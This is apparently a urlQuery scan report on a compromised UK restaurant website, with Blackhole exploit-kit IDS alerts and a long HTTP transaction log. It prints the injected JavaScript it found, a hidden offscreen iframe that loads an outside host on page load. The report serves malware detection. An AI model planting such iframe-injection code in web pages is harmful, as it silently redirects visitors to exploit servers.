Overview

URLhttp://www.sagar.uk.com/
IP83.170.122.174
ASNAS13213 UK2 - Ltd
Location United Kingdom
Report completed2012-11-17 04:16:24 CET
StatusLoading report..
urlQuery Alerts Detected malicious iframe injection


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-17 04:15:51 83.170.122.174 urlQuery Client1ET CURRENT_EVENTS Blackhole Landing Page Eval Variable Obfuscation 3
2012-11-17 04:15:53 74.53.143.237 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
2012-11-17 04:15:57 83.170.122.174 urlQuery Client3FILEMAGIC Macromedia Flash data,
Snort /w Sourcefire VRT
Timestamp Source IP Destination IP Severity Alert
2012-11-17 04:15:51 83.170.122.174 urlQuery Client1EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch
2012-11-17 04:15:51 83.170.122.174 urlQuery Client1EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch


Recent reports on same IP/ASN/Domain

Last 1 reports on IP: 83.170.122.174

Date Alerts / IDS URL IP
2012-11-17 04:34:311 / 5http://www.sagar.uk.com/index.php83.170.122.174

Last 6 reports on ASN: AS13213 UK2 - Ltd

Date Alerts / IDS URL IP
2013-02-13 20:32:150 / 0http://soros.al83.170.74.74
2013-02-13 08:33:210 / 0http://www.starresidencyhotels.chobs.in/77.92.71.237
2013-02-13 05:29:291 / 3http://androidexperts.co.uk/root-z4root-android-app77.92.88.1
2013-02-11 23:43:560 / 0http://www.tajdeed.org.uk83.170.87.65
2013-02-11 11:13:050 / 0http://www.textaloannow.co.uk46.23.71.160
2013-02-11 11:10:220 / 0http://www.textaloannow.co.uk/contact-us.php46.23.71.160

Last 1 reports on domain: www.sagar.uk.com

Date Alerts / IDS URL IP
2012-11-17 04:34:311 / 5http://www.sagar.uk.com/index.php83.170.122.174



JavaScript

Executed Scripts (1)


Executed Evals (2)

#1 JavaScript::Eval (size: 291, repeated: 1) - Alert detect on script (Severity: 2)

function frmAdd() {
    var ifrm = document.createElement('iframe');
    ifrm.style.position = 'absolute';
    ifrm.style.top = '-999em';
    ifrm.style.left = '-999em';
    ifrm.src = "http://miamiheattickets.com/http.php";
    ifrm.id = 'frmId';
    document.body.appendChild(ifrm);
};
window.onload = frmAdd;

#2 JavaScript::Eval (size: 3, repeated: 291) 

j % 3

Executed Writes (0)



HTTP Transactions (25)


Request Response 
GET / HTTP/1.1

Host: www.sagar.uk.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 200 OK

Content-Type: text/html

Date: Sat, 17 Nov 2012 03:15:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=4c824e6715da35a4ef8dcd5cbe1cadaa; path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /css/qc_sagar.css HTTP/1.1

Host: www.sagar.uk.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sagar.uk.com/
Cookie: PHPSESSID=4c824e6715da35a4ef8dcd5cbe1cadaa
 
HTTP/1.1 200 OK

Content-Type: text/css

Date: Sat, 17 Nov 2012 03:15:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 03 Aug 2010 12:33:42 GMT
Etag: "439c4bc-1c86-48cea86fff580"
Accept-Ranges: bytes
Content-Length: 7302
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /images/favicon.ico HTTP/1.1

Host: www.sagar.uk.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=4c824e6715da35a4ef8dcd5cbe1cadaa
 
HTTP/1.1 200 OK

Content-Type: image/x-icon

Date: Sat, 17 Nov 2012 03:15:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 03 Aug 2010 13:06:10 GMT
Etag: "439c055-37e-48ceafb1c1480"
Accept-Ranges: bytes
Content-Length: 894
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /images/main_bg.gif HTTP/1.1

Host: www.sagar.uk.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sagar.uk.com/css/qc_sagar.css
Cookie: PHPSESSID=4c824e6715da35a4ef8dcd5cbe1cadaa
 
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1

Date: Sat, 17 Nov 2012 03:15:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 520
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /images/logo.jpg HTTP/1.1

Host: www.sagar.uk.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sagar.uk.com/
Cookie: PHPSESSID=4c824e6715da35a4ef8dcd5cbe1cadaa
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Sat, 17 Nov 2012 03:15:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 21 Jul 2010 03:23:06 GMT
Etag: "439c076-28f1-48bdd51f6ba80"
Accept-Ranges: bytes
Content-Length: 10481
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /images/main_menu_bg.gif HTTP/1.1

Host: www.sagar.uk.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sagar.uk.com/css/qc_sagar.css
Cookie: PHPSESSID=4c824e6715da35a4ef8dcd5cbe1cadaa
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Sat, 17 Nov 2012 03:15:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 21 Jul 2010 23:12:02 GMT
Etag: "439c07a-1a65-48bededebb480"
Accept-Ranges: bytes
Content-Length: 6757
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /images/set_menu_bg.gif HTTP/1.1

Host: www.sagar.uk.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sagar.uk.com/css/qc_sagar.css
Cookie: PHPSESSID=4c824e6715da35a4ef8dcd5cbe1cadaa
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Sat, 17 Nov 2012 03:15:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 22 Jul 2010 00:37:14 GMT
Etag: "439c084-ef1-48bef1e9ea280"
Accept-Ranges: bytes
Content-Length: 3825
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /images/card.jpg HTTP/1.1

Host: www.sagar.uk.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sagar.uk.com/
Cookie: PHPSESSID=4c824e6715da35a4ef8dcd5cbe1cadaa
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Sat, 17 Nov 2012 03:15:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 03 Sep 2010 08:33:38 GMT
Etag: "439c050-1c49-48f56c988fc80"
Accept-Ranges: bytes
Content-Length: 7241
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /images/free_home_delivery.jpg HTTP/1.1

Host: www.sagar.uk.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sagar.uk.com/
Cookie: PHPSESSID=4c824e6715da35a4ef8dcd5cbe1cadaa
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Sat, 17 Nov 2012 03:15:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 22 Jul 2010 00:22:06 GMT
Etag: "439c057-2dca-48beee87fa780"
Accept-Ranges: bytes
Content-Length: 11722
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /images/open_img.jpg HTTP/1.1

Host: www.sagar.uk.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sagar.uk.com/
Cookie: PHPSESSID=4c824e6715da35a4ef8dcd5cbe1cadaa
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Sat, 17 Nov 2012 03:15:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 22 Jul 2010 00:25:44 GMT
Etag: "439c07f-2d44-48beef57e1200"
Accept-Ranges: bytes
Content-Length: 11588
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /images/meal_4_1.gif HTTP/1.1

Host: www.sagar.uk.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sagar.uk.com/css/qc_sagar.css
Cookie: PHPSESSID=4c824e6715da35a4ef8dcd5cbe1cadaa
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Sat, 17 Nov 2012 03:15:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 22 Jul 2010 00:48:32 GMT
Etag: "439c07b-14f8-48bef47081800"
Accept-Ranges: bytes
Content-Length: 5368
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /images/meal_4_2.gif HTTP/1.1

Host: www.sagar.uk.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sagar.uk.com/css/qc_sagar.css
Cookie: PHPSESSID=4c824e6715da35a4ef8dcd5cbe1cadaa
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Sat, 17 Nov 2012 03:15:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 22 Jul 2010 01:08:28 GMT
Etag: "439c07c-1502-48bef8e519b00"
Accept-Ranges: bytes
Content-Length: 5378
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /images/meal_4_3.gif HTTP/1.1

Host: www.sagar.uk.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sagar.uk.com/css/qc_sagar.css
Cookie: PHPSESSID=4c824e6715da35a4ef8dcd5cbe1cadaa
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Sat, 17 Nov 2012 03:15:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 22 Jul 2010 01:15:00 GMT
Etag: "439c07d-150e-48befa5af0d00"
Accept-Ranges: bytes
Content-Length: 5390
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /images/meal_4_4.gif HTTP/1.1

Host: www.sagar.uk.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sagar.uk.com/css/qc_sagar.css
Cookie: PHPSESSID=4c824e6715da35a4ef8dcd5cbe1cadaa
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Sat, 17 Nov 2012 03:15:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 22 Jul 2010 01:20:08 GMT
Etag: "439c07e-1519-48befb80ac200"
Accept-Ranges: bytes
Content-Length: 5401
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /images/banner_bg.gif HTTP/1.1

Host: www.sagar.uk.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sagar.uk.com/css/qc_sagar.css
Cookie: PHPSESSID=4c824e6715da35a4ef8dcd5cbe1cadaa
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Sat, 17 Nov 2012 03:15:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 03 Sep 2010 08:33:39 GMT
Etag: "439c03c-a917-48f56c9983ec0"
Accept-Ranges: bytes
Content-Length: 43287
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /images/footer_bg.gif HTTP/1.1

Host: www.sagar.uk.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sagar.uk.com/css/qc_sagar.css
Cookie: PHPSESSID=4c824e6715da35a4ef8dcd5cbe1cadaa
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Sat, 17 Nov 2012 03:15:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 22 Jul 2010 01:26:02 GMT
Etag: "439c056-c81c-48befcd245e80"
Accept-Ranges: bytes
Content-Length: 51228
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /get/flashplayer/update/current/xml/version_en_win_pl.xml HTTP/1.1

Host: fpdownload2.macromedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 200 OK

Content-Type: text/xml

Server: Apache
Last-Modified: Wed, 31 Oct 2012 21:22:10 GMT
Etag: "87de33-256-4cd617ed12480"
Accept-Ranges: bytes
Content-Length: 598
Date: Sat, 17 Nov 2012 03:15:52 GMT
Connection: keep-alive
GET /images/banner.swf HTTP/1.1

Host: www.sagar.uk.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sagar.uk.com/
Cookie: PHPSESSID=4c824e6715da35a4ef8dcd5cbe1cadaa
 
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash

Date: Sat, 17 Nov 2012 03:15:52 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 20 Feb 2012 12:51:45 GMT
Etag: "439c06e-7e0eb-4b964c1bb7a40"
Accept-Ranges: bytes
Content-Length: 516331
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /http.php HTTP/1.1

Host: miamiheattickets.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sagar.uk.com/
 
HTTP/1.1 404 Not Found

Content-Type: text/html

Date: Sat, 17 Nov 2012 03:15:53 GMT
Server: Apache
Last-Modified: Tue, 10 Apr 2012 05:19:44 GMT
Accept-Ranges: bytes
Content-Length: 3354
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
GET /images/404mid.gif HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://miamiheattickets.com/http.php
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Sat, 17 Nov 2012 03:15:53 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 12 Jul 2010 18:56:30 GMT
Etag: "e3899dc-78-48b354f7d9380"
Accept-Ranges: bytes
Content-Length: 120
Connection: close
GET /images/x.png HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://miamiheattickets.com/http.php
 
HTTP/1.1 200 OK

Content-Type: image/png

Date: Sat, 17 Nov 2012 03:15:53 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 12 Jul 2010 18:56:30 GMT
Etag: "e3899de-a70-48b354f7d9380"
Accept-Ranges: bytes
Content-Length: 2672
Connection: close
GET /images/404bottom.gif HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://miamiheattickets.com/http.php
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Sat, 17 Nov 2012 03:15:53 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 12 Jul 2010 18:56:30 GMT
Etag: "e3899d8-219-48b354f7d9380"
Accept-Ranges: bytes
Content-Length: 537
Connection: close
GET /images/gatorbottom.png HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://miamiheattickets.com/http.php
 
HTTP/1.1 200 OK

Content-Type: image/png

Date: Sat, 17 Nov 2012 03:15:53 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Wed, 11 May 2011 20:45:00 GMT
Etag: "e3899df-1bae-4a306256eeb00"
Accept-Ranges: bytes
Content-Length: 7086
Connection: close
GET /images/404top.gif HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://miamiheattickets.com/http.php
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Sat, 17 Nov 2012 03:15:53 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 12 Jul 2010 18:56:30 GMT
Etag: "e3899dd-5299-48b354f7d9380"
Accept-Ranges: bytes
Content-Length: 21145
Connection: close
GET /images/hg728x90.swf?clickTAG=http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=page404 HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://miamiheattickets.com/http.php
 
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash

Date: Sat, 17 Nov 2012 03:15:53 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 12 Jul 2010 18:56:30 GMT
Etag: "e3899ca-a95c-48b354f7d9380"
Accept-Ranges: bytes
Content-Length: 43356
Connection: close